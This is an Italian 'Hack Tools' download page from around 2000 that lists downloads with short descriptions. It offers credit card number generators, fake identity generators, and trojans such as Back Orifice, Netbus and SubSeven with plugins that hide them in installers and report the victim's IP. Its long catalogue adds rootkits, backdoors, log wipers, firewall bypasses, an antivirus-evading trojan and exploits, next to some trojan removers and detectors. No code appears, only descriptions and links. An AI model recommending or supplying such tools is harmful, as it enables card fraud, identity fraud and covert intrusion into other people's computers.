Best View 1024 x 768

 

 

 

 

 

Home Page

 

W W W . J N E T W O R L D . C O M

 

Home > Hackers > Hack Tools

Tutto il materiale contenuto in questa sezione è a scopo informativo pertanto non mi riterrò responsabile dell'utilizzo che ne verrà fatto da parte degli utenti.

 

 

Rendersi invisibili nella reteE-mail anonime



 - Carte di credito

 - Back Orifice

 - Tools vari

 - Cleaner

 - Generatori di identità

 - Tools & Releases (Win / Linux)

 - Links


 

CARTE DI CREDITO

Scarica questi software:

Ti permetteranno di generare numeri di carte di credito come come VISA ed AMERICAN EXPRESS! Naturalmente i software non sono in grado di capire se i numeri generati sono attivi o meno... questo sta a te!:

 

Credit Card Generator

Credit card generator Visa/Amercan Express

[Download]

 

THC-Credit v1.9

THC-Credit version 1.9 a Credit Card Generator.

[download]

 

Cmaster4 v4.0

Visa/Mastercard/American Express, generated on screen, file or printed.

[download]

 

Vcard v1.25

Visa/Mastercard/Discovery, command line generated or interactive mode.

[download]

 

Cardpro v1.0

V/M/D generate, validate, runs in win95/98. Includes USA address generator.

[download]

 

Cwizard v1.1

V/M/D generate, validate, 95/98 inc. USA address generator.

[download]

 

Thc-tc18 v1.8

Generate, extrapolate from existing card base.

[download]

 

Cisis v1.0

If you know an Isis managers number for TRW use this and have some fun.

[download]

 

^ On Top


 

BACK ORIFICE

Plug ins

 

ButTrumpet

A plugin that sends you an email with the host's IP address once installed.

[download]

 

SilkRope 2.0

A packager that allows you to bind Back Orifice to most any existing program.

[download]

 

Buttsnif 0.92

BUTTSniffer is a packet sniffer and network monitor for Win95, Win98 and also NT 4.0

[download]

 

Speakeasy

An IRC plugin that secretly logs into a predefined server and broadcasts the host's IP address.

[download]

 

Saranwrap

A packager that allows you to hide Back Orifice in an existing standard "Install Shield"-like installer.

[download]

 

FAQ about plug-ins

Back Orifice plugin FAQ.

[download]

 

 

2000 Plug ins


IRC plugin for BO2K v1.0

IRC plugin for BO2K v1.0. It is an IRC client, Channel bot style. Is fully customizable and logged into an IRC server, it is remotely administrable through the IRC /msg or /query commands. The Bot will rejoin any channel where get kicked, reconnect on disconnect, generate random nicks on raw 432 or 433, can delete, list, copy, spawn files on remote machine through irc.

[download]

 

BO Cast v2.4 with source - 9x/NT version

This plugin adds CAST6-256 encryption capability to your BO2K. The strongest available encryption for BO2K. As simple as that.

[download]

 

IDEAEncrypt v1.0

An IDEA encryption engine for BO2K. Now in version 1.0 it offers everyone in the world the chance to have 128-bit encryption protecting their BO2K session.

[download]

 

Butt Trumpet 2000 v1.2

The Butt Trumpet 2000 plugin for BO2K. Once installed and started, this plugin sends you an email with the host's IP address.

[download]

 

BOred v0.1

The BOred plugin for BO2K. It is still in development, but will allow you to turn the BO'ed machine into not much more than a boring dumb terminal.

[download]

 

SilkRope 2K v0.9

Bind your BO2K server to an existing program. New and improved! Now features: a full graphical user interface for setup and an target date for infection.

[download]

 

BOTOOL v1.0

BOTOOL is a point-and-click graphical interface to remotely manage files and the remote registry. It provides a remote 'explorer'-like file browser. You can upload and download files securely, as well as copy, rename and delete files and directories. The remote registry editor allows you full registry editing capabilities over the BO2K secure command channel.

[download]

 

^ On Top


 

Ancora Tools...

 

Netbus

Collegati alla pagina Netbus per sapere tutto quello che ti serve (installazione e configurazione) e per scaricare il programma.

[vai alla pagina Netbus]

 

BackOffice 2000

Famoso trojan simile a Netbus.

[download]

 

Sorgenti BackOffice 2000                                                      

Le sorgenti per BackOffice 2000.

[download]

 

DeepThroat v3.1 (server and client included in this package)
[download]

 

SchoolBus v1.60
[download]

 

Donald Dick v1.52 (client & server for Windows 95/98/NT)
[download]

 

BO2K International Distribution v1.0
[download]

 

NetSphere 1.30 (1999)
[download]

 

7Sphere

[download]

 

Subseven v2.1 MUIE
[Needed DLL] [download]

 

Hack'a'Tack
[download]

 

Back Orifice client and server (1998)
[download]

 

^ On Top


 

CLEANER:

 

CLEANER

        Ripulisce il nostro computer dai Trojan.

        [download]

 

CLEANER 3.1

        Verifica la presenza di qualsiasi forma di Trojan. Riesce a rimuoverne più di 1000 formati diversi!!

        [download] - [home page]

 

ANTIBO (Back Orifice)

         Pulisce il BO in windows/system

         [download]

 

BODETECT 2.5

         Pulisce il BO in windws/system

         [download]

 

BO SCANNER V 0.3

         Scan Back Orifice

         [home page]

 

ANTIGEN 2000

         Programma che permette di eliminare il Trojan BO2K.

         [download]

 

LOCKDOWN 2000 

         Pulisce dai Trojans Lockdown

         [download]

 

MILLENIUM REMOVER  

            Pulisce dai trojans Millenium

         [download]

 

BOSHIELD

          Permette di identificare il server Back Orifice in esecuzione, dopo l'installazione esso rimane in costante esecuzione per avvertirti della presenza dell'Orifice.

          [download]

 

^ On Top


 

GENERATORI DI IDENTITA':

 

GENER ID

        Genera identità false, utile per registrarsi quando viene richiesto anche il codice fiscale in provider che offrono connessioni internet.

        [download]

 

GENERATORE DI IDENTITA'

        Altro generatore di ID molto utile.

        [download]

 

^ On Top


Here you can download the public tools coded by s0ftpr0ject and the ones issued with Butchered From Inside.
The tools were created in order to improve security and privacy, s0ftpr0ject dissociates itself from any illegal misuse of the material here displayed, and cannot be held responsible of it.
For further informations about the tools, please contact the author directly.
You can download these tools from our mirror located at packetstorm too.

 

Passate RELEASES

 

KSEC - Kernel Security Checker

pIGpEN

Great tool useful to find an attacker in your system by a direct analysis of the kernel throught /dev/kmem and bypassing the hiding techniques of the intruder (kernel static recompilation/use of LKMs).
KSec can find the modified syscalls from userspace, detect the promisc interfaces, find the modifications applied to a protocol and much more...
[FreeBSD, OpenBSD - c source]

KSTAT - Kernel Security Therapy Anti-Trolls

FuSyS

Great tool useful to find an attacker in your system by a direct analysis of the kernel throught /dev/kmem and bypassing the hiding techniques of the intruder (kernel static recompilation/use of LKMs).
Kstat can find the syscalls wich were modified by a LKM, list the linked LKMs, query one or all the network interfaces of the system, list all the processes and much more...
[Linux - c source]

Anti Anti Sniffer Patch

vecna

Kernel patches to hide a sniffer from the most known anti-sniffers.
[Linux - c source]

Fingerprint Fucker

FuSyS & |CyRaX|

This LKM changes the linux stack to emulate other operative systems against nmap fingerprints (maybe others).
[Linux - LKM c source]

Securelevel Bypass

pIGpEN

This kld gives you permission to load/unload a kld and modify a sysctl value even if you aren't root and securelevel is higher than 0.
[FreeBSD - KLD c source]

SMonitor

pIGpEN

Using this tool you are allowed to monitor the use of the syscalls on your system and to prevent their execution for the specified users/groups.
[FreeBSD - c source]

LIBVSK 1.0

vecna

Libvsk is a set of libraries for network traffic manipulation from userlevel, whith some functions of filtrering/sniffing.
[Linux - c source]

Simple Packet Forwarder

vecna

Simple packet forwarder from datalink level (needs libvsk).
[Linux - c source]

Sinto

vecna

This tool lets you send and execute commands on a hijacked tty.
[Linux - c source]

Piove

vecna

This module shows how to intercept getpass(3) function and print anything that is typed without terminal echo.
[FreeBSD - KLD c source]

SRaw (FreeBSD 4)

pIGpEN

All users are allowed to open raw sockets: this kld disables EPERM in socket() and permits to allocate inpcb even if the socket is raw and users haven't root permissions bypassing suser() in pru_attach() functions.
[FreeBSD - KLD c source]

SRaw (OpenBSD)

pIGpEN

This code makes all users able to open raw sockets. Supported protocols are IPPROTO_RAW, IPPROTO_ICMP, IPPROTO_IPIP, IPPROTO_IPV4, IPPROTO_IGMP.
[OpenBSD - c source]

THC Backdoor (OpenBSD)

pIGpEN

This is a simple but useful backdoor for OpenBSD based on a FreeBSD lkm by pragmatic/THC
[OpenBSD - c source]

THC Backdoor (Linux)

bELFaghor

This is a simple but useful backdoor for Linux based on a FreeBSD lkm by pragmatic/THC
[Linux - c source]

L.L.H.M. - Low Level Header Manipulation

valv0

This tool hides pieces of information in your files.
[Win32 - c source]

SMS Spoofing

Jack McKraK

Spoof your SMS by using this code with smsclient.
[Linux - c source]

^ On Top

 

Altri TOOLS

 

LKM Detector

pIGpEN

Module that finds LKM that modify the system. It acts comparing the original address fo a kernel routine and the effective address where the internal pointer to that structure refers.
Documentation: 'LKM: TR0VARLi' , BFi8 File 23 (Aprile 2k)
[FreeBSD - KLD c source]

SRaw for FreeBSD

pIGpEN

All users are allowed to open raw sockets...
This kld disables EPERM in socket() and permits to allocate inpcb even if the socket is raw and users haven't root permissions... bypassing suser() in pru_attach() functions...
[FreeBSD - KLD c source]

Network kernel hackin' on a FreeBSD box

pIGpEN

We can change functions of a struct of inetsw[], we can change mbuf structures... we can access inpcb,inpcbinfo structures... we can change options of every layer in a connection...
[FreeBSD - c source]

Crypto Library v0.1b

valv{0} & vecna

Implementation of RSA cryptographic system.
Documentation: 'RSA E CRiTT0GRAFiA SiMMETRiCA FTM' , BFi8 File 18 (Aprile 2k)
[Win32 - c++ sources]

SCNS

del0rean

Simple Community Name sniffer.
Documentation: 'SNMP C0MMUNiTY NAME SNiFFER' , BFi8 File 16 (Aprile 2k)
[Linux - c source]

oMBRa

FuSyS

Loadable Kernel Module for hiding in the system. Implementation of CaRoGNa module, for Linux 2.2.x kernel
Documentation: '0MBRE E LUCi DEL KERNEL LiNUX 2.2.X: oMBRa LKM' , BFi8 File 14 (Aprile 2k)
[Linux - LKM c source]

LuCe

FuSyS

Kernel module for Linux that watches the system, and add the ability to add on the fly increased security to an existing configuration. It contains a simple implementation of BSD securelevel, waiting for official implementation with Linux Capabilities [POSIX 1.e] in the 2.4.x kernel of solid ACL.
Documentation: '0MBRE E LUCi DEL KERNEL LiNUX 2.2.X: LuCe LKM' , BFi8 File 15 (Aprile 2k)
[Linux - LKM c source]

N0Sp00f (Linux)

FuSyS

Simple module that avoids that our system will be used as hop start for spoofed attacks. Implementation for Linux 2.2.x - Datalink Bypassable and Network Layer Protection
Documentation: 'DDoS PET-NEMESiS: SP00FiNG DETECTi0N' , BFi8 File 13 (Aprile 2k)
[Linux - LKM c source]

N0Sp00f (FreeBSD)

pIGpEN

This KLD finds ip spoofing attempts, if based on setsockopt() system call, via IP_HDRINCL.- Datalink Bypassable and Network Layer Protection
Documentation: 'DDoS PET-NEMESiS: SP00FiNG DETECTi0N' , BFi8 File 13 (Aprile 2k)
[FreeBSD - KLD c source]

N0Sp00f (OpenBSD)

pIGpEN

Protection for IP_HDRINCL; diff file for /sys/netinet/raw_ip.c of OpenBSD 2.6 - Datalink Bypassable and Network Layer protection
Documentation: 'DDoS PET-NEMESiS: SP00FiNG DETECTi0N' , BFi8 File 13 (Aprile 2k)
[OpenBSD - c source + diff]

Obscura (FreeBSD)

pIGpEN

Total obscurity of PROMISC mode.
DDocumentation: 'FADE TO BLACK DEL PROMISC MODE... MA...' , BFi8 File 12 (Aprile 2k)
[FreeBSD - c source]

Obscura(OpenBSD)

pIGpEN

Total obscurity of PROMISC mode.
DDocumentation: 'FADE TO BLACK DEL PROMISC MODE... MA...' , BFi8 File 12 (Aprile 2k)
[OpenBSD - c source]

Bad Packets Logger

pIGpEN

Module that uses the stat UDP structures and shows via syslog the source of suspect packets.
Documentation: 'UTiLiZZARE LE STRUTTURE Di STATiSTiCA DEL KERNEL' , BFi8 File 11 (Aprile 2k)
[FreeBSD - KLD c source]

Kerninetstat (FreeBSD)

pIGpEN

This simple source uses sysctlbyname() in order to get statistics of a protocolo, useful for analyzing them for security reasons or for testing the kernel.
Documentation: 'UTiLiZZARE LE STRUTTURE Di STATiSTiCA DEL KERNEL' , BFi8 File 11 (Aprile 2k)
[FreeBSD - KLD c source]

Kerninetstat (OpenBSD)

pIGpEN

Kerninetstat porting (FreeBSD) for OpenBSD.
Documentation: 'UTiLiZZARE LE STRUTTURE Di STATiSTiCA DEL KERNEL' , BFi8 File 11 (Aprile 2k)
[OpenBSD - lkm c source]

Hacking IP FILTER (FreeBSD)

pIGpEN

Kernel module that bypass ipfilter rules.
Documentation: 'HACKiNG iPFiLTER ViA LKM' , BFi8 File 10 (Aprile 2k)
[FreeBSD - KLD c source]

Hacking IP FILTER (OpenBSD)

pIGpEN

Kernel module that bypass ipfilter rules.
Documentation: 'HACKiNG iPFiLTER ViA LKM',BFi8 File 10 (Aprile 2k)
[OpenBSD - lkm c source]

Eth.Out. Example

pIGpEN

Example of modified output function for an ethernet interface.
Documentation: 'BSD KERNEL: AGiRE SULLE iNTERFACCE Di RETE' , BFi8 File 9 (Aprile 2k)
[FreeBSD - KLD c source]

KCheck

pIGpEN

IGMP/ICMP/IPIP/IDP/RSVP/IPIP/IPPROTO_RAW Kernel checker.
Documentation: 'BSD KERNEL: AGiRE SULLE R0UTiNE Di iNTERFACCiAMENT0 TRA PR0T0C0LL0 E S0CKET' , BFi8 File 8 (Aprile 2k)
[FreeBSD - KLD c source]

UDP Spoof Detect

pIGpEN

KLD that detects UDP spoofing tries.
Documentation: 'BSD KERNEL: AGiRE SULLE R0UTiNE Di iNTERFACCiAMENT0 TRA PR0T0C0LL0 E S0CKET' , BFi8 File 8 (Aprile 2k)
[FreeBSD - KLD c source]

NetRaider

\sPIRIT\

Remote administration tool
[win32 - asm source]

sWEETM+NT

\sPIRIT\

Network scanning tool (outdated)
[linux - bash script]

FwBypass

pIGpEN

Kernel Module that permits to bypass the firewall when the request comes from a specified ip address.
[FreeBSD - c source]

NetHack

pIGpEN

Network kernel hacking on a FreeBSD box.
[FreeBSD - c source]

PrintSux

pIGpEN

This src grabs documents printed on a network printer installed with lpd.
It works only with normal hubs and without security layers.
[Linux - c source]

GORK v2.0b

pIGpEN

tcp/udp/icmp/ip dumper which also permits to log only packets with the specified source/destination host and port; it supports the pcap library.
version 2.0b - bugs fixed
[Linux/*BSD - c source]

SPJY2Ksniff
(newbie version)

FuSyS

Network sniffer to operate passive attacks and find weaknesses in the protection of the traffic on your LAN. It uses the pcap(3) library to access to datalink level. Newbie (limited) version.
[Linux - c source]

cdda2cdr exploit

FuSyS

/usr/bin/cdda2cdr exploit on SuSE 6.2
Documentation: 'HACKiNG SPiCCi0L0' , BFi 7 File 11 (Dicembre 99)
[Linux SuSE 6.2 - bash script]

SpoofLKM

pIGpEN

LKMs to forge and detect spoofed packets on your host.
Documentation: 'SP00FiNG & SP00FiNG DETECTi0N ViA LKM FR0M A LiNUX B0X' BFi 7 , File 8 (Dicembre 99) ; 'Building Into The Linux Network Layer' (Phrack vol.9, issue 55, file 12 of 19)
[Linux/*BSD - c source]

G0RK

pIGpEN

tcp/udp/icmp/ip dumper which also permits to log only packets with the specified source/destination host and port; it supports the pcap library.
Documentation: 'G0RK: A SiMPLE & P0WERFUL PACKET L0GGER' , BFi7 File 09 (Dicembre 99)
[Linux/*BSD - c source]

ICMP Tunneling Library
(win32 version)

Dark Schneider

ICMP Tunneling Library v1 by FuSyS ported on Win32.
Documentation: 'UNDERC0VER W0RK' , BFi 7 File 13 (Dicembre 99); 'PR0GETT0 NiNJA' , BFi4 (Dicembre 98)
[Win32 - c source]

VLV-CRYPT v1.0b
(win32 version)

\\alv^iCf

VlV-Crypt v1.0b - 32Bit SingleKey Engine Edition: cryptographic utility using private key.
Documentation: 'VLV-CRYPT v1.0b 32BiT SiNGLEKEY ENGiNE EDiTi0N' , BFi 7 File 14 (Dicembre 99) ; readme
[Win32 - ASM source/binary]

SYSL0GD trojan

bELFaghor

These patches applied to syslogd 1.3-31 sources add a new priority, and using it it's possible to execute locally new commands without be logged.
Documentation: 'SYSLOGD TROJAN' , BFi6 (Giugno 99)
[Linux - patch]

xACES

pIGpEN

TCP/UDP/RPC/finger/NFS/samba/web/phone scanner with string comparing option. XWindows version.
Documentation: 'ACES HiGH 2.7' , BFi5 (Marzo 99)
[Linux/GTK]

xTH0T v1.0

FuSyS

Tcp/ip Hacking Ominous Tool.
Documentation: 'XTH0T v.1.0', BFi6 (Giugno 99)
[Linux/GTK - c source]

0N0S3NDAi
(blind ip spoofing)

FuSyS

Support tools for 0N0S3NDAi project.
Includes:
- SEQprobe (displays remote host's ISN generation)
- SMail v2 (the DEFINITIVE fake mail)
Documentation: 'PR0GETT0 0N0S3NDAi - PARTE II' , BFi6 (Giugno 99)
[Linux - c source]

RPC Backdoor

pIGpEN

A Backdoor that uses an rpc program to introduce in the host a remote access facility.
Documentation: 'COME MASTURBARE LE RPC E OTTENERE UNA BACKDOOR', BFi6 (Giugno 99)
[Linux - c source]

NetBIOS scan v1.0

DoLD & Klistron

Shared resource scanner.
[Win9x - c source]

RPC program scan

pIGpEN

Finds an rpc program by its number scanning a range of ip's.
Documentation: 'VULNERABiLiTA' di RPCBiND', BFi6 (Giugno 99)
[Linux - c source]

DeadScan v1.0

pIGpEN

Simple war dialer.
Documentation: 'WAR DIALER X LINUX', BFi6 (Giugno 99)
[Linux - c source]

Wu-Thang

del0rean

Vulnerable Wu-FTPD versions scanner (adapted from statd scanner by BiT).
[Linux - c source]

bELFaghor

Kit including various tools to hide from logs generated by ACCT.
Includes:
- ACCT Knocker
- hydra v0.1
- Leipzig v0.1
- LocalFuck v0.1
- Obscura Mens v0.1
- Xytaxehedron v0.1
- Xytaxehedron v0.1i
Documentation: 'ACCT' , BFi5 (Marzo 99)
[Linux/*BSD - c sources]

bELFaghor

Kit including various tools for generating fake logs and read/redirect logs generated by SYSKLOGD.
Includes:
- Shub-Niggurath
- vru vru vruk
- WALLA WALLA v0.1
- WALLA WALLA v0.2
Documentation: 'SYSLOGD' , BFi5 (Marzo 99)
[Linux - c sources]

FuSyS

Tool to scan a LAN in order to find interfaces in PROMISC mode. It's accomplished by using non-standard queries.
Documentation: 'TCP/iP HACKS F0R PHUN AND PR0FiT', BFi5 (Marzo 99)
[Linux - c source]

FuSyS

TCP forger.
Documentation: 'TCP/iP HACKS F0R PHUN AND PR0FiT' , BFi5 (Marzo 99)
[Linux - c source]

FuSyS

RST Storm: destroys TCP links.
Documentation: 'TCP/iP HACKS F0R PHUN AND PR0FiT' , BFi5 (Marzo 99)
[Linux - c source]

pIGpEN & bELFaghor

TCP/UDP/RPC/finger/NFS/samba/web/phone scanner with string comparing option.con funzione di comparazione di stringa.
Documentation: 'ACES HiGH 2.7' , BFi5 (Marzo 99); aces.doc
[Linux - c source]

ValV-N.e.T. v2.0b2
(Not Earthy Trojan)

\\alv^iCf

Remake of NETbus 1.7, with some more options, and a polymorphic engine to make the patch invisible to any antivirus.
Documentation: manual.txt
[Win9x/NT - binary]

\\alv^iCf

Highly customizable patcher.
Documentation: readme.txt
[DOS - binary]

Technolord

Patcher with integrated VM and GUI and with plugins support.
Documentation: 'PATCHER PR0 v0.3 t(est) e(valuation)', BFi4 (Dicembre 98); manual.txt
[DOS - binary]

pIGpEN

rpc.ttdbserver scanner (adapted from statd scanner by BiT), it uses a file containing the list of ip's to scan.
Documentation: 'RPC.TTDBSERVER SCANNER' , BFiSN98 (Dicembre 98)
[Linux - c source]

pIGpEN & \sPIRIT\

Kit including two tools that scan for exploitable versions of IMAP4; the scan can be accomplished by specifying a single host or using a file containing all the ip's..
Includes:
- Imap4 scanner
- Imap4 checker
Documentation: 'iMAP4 SCANNER' , BFiSN98 (Dicembre 98)
[Linux - c source]

pIGpEN

C version of gcc 2.7.2.x exploit by Michal Zalewsky.
Documentation: 'GCC 2.7.2.x EXPL0iT: C VERSi0N' , BFiSN98 (Dicembre 98)
[Linux - c source]

Cavallo

Trojan that enables file and printer sharing, and then enables sharing on all drives with full access.
Documentation: 'WiND0WS E PASSW0RD' , BFi4 (Dicembre 98); file_id.diz
[Win9x - binary]

0N0S3NDAi
(non blind ip spoofing)

FuSyS

Support tools for 0N0S3NDAi project.
Includes:
- MyWay (simple telnet session hijacker)
- Simple Linux Sniffer v0.3
Documentation: 'PR0GETT0 0N0S3NDAi - PARTE I' , BFi4 (Dicembre 98)
[Linux - c source]

FuSyS

Shell hidden into ICMP tunneling that uses 0x00 ECHO REPLY messages to carry data.
Includes:
- 007Shell
- ICMP Tunneling Library v1
Documentation: 'PR0GETT0 NiNJA' , BFi4 (Dicembre 98)
[Linux - c source]

FuSyS

Loadable Kernel Module to hide in a system. It substitutes in 4kbytes a full rootkit. Only for 2.0.x kernels.
Documentation: 'PR0GETT0 CAR0NTE - PARTE I' , BFi3 (Luglio 98); 'PR0GETT0 CAR0NTE - PARTE II' , BFi4 (Dicembre 98)
[Linux - LKM c source ]

b0z0

Network datapipe with interactive mode, support for proxy server socks (v4 e v5), logging facility and option to concatenate more pipes.
Documentation: 'PiPPA v2', BFi4 (Dicembre 98)
[Linux/WinNT - perl source]

FuSyS

Utmp editor that permits to change id, tty and host of a user logged in the system.
Documentation: 'T00LS PER RiMANERE iN 0MBRA S0TT0 UNiX', BFi3 (Luglio 98)
[Linux - c source]

FuSyS

Log editor that cleans Utmp, Wtmp, LastLog, Messages, XferLog, Secure and MailLog.
Documentation: 'T00LS PER RiMANERE iN 0MBRA S0TT0 UNiX', BFi3 (Luglio 98)
[Linux - c source]

FuSyS

Simple socket shell.
Documentation: 'BACKD00R: iDEE ED iMPLEMENTAZi0Ni', BFi3 (Luglio 98)
[Linux - c source]

\\alv^iCf

Cryptographic utility using private key (4096 bytes), random salting.
Documentation: 'CRYPT V.6.0.0', BFi3 (Luglio 98); readme.txt
[DOS - binary]

b0z0

Network datapipe.
Documentation: 'PIPPA, A NETWORK DATAPIPE IN PERL', Xine #3 (Maggio 98)
[Linux - perl source]

|scacco| & Dark Schneider

Phf - test-cgi - htmlscript - view-source - wrap - campas - pfdisplay - webdist - aglimpse - php - nph-test-cgi scanner.
Documentation: 'C0DEZ', BFi2 (Maggio 98); 'N0NS0L0PHF', BFi3 (Luglio 98)
[Linux - c source]

FuSyS

Modified version of Todd Vierling's datapipe, where you can specify a name that will be displayed instead of the process' name.
Documentation: 'COME OCCULTARSi IN UN SiSTEMA UNiX', BFi2 (Maggio 98)
[Linux - c source]

 


 

Gli arnesi del mestiere:

 

Collegatevi a questa web page di Bismark:

Troverete tools di vario genere, screenshot, software (WebCracker 4.0), clickers

e molto altro e links da dove è possibile scaricare di tutto!...

 

HackTools

http://www.bismark.it/tools

 

Se invece ti interessi di clickers:

 

Clickers - cheat surf - screenshot

http://generators.virtualave.net

 

^ On Top


Ricerca su ASTALAVISTA

 

ICQ: 64895872 - E-mail: jnet@iol.it

Best view: 1024 x 768 / all right reserved © 2000/2001 The Last Day in the Web 

   

 

 

On Top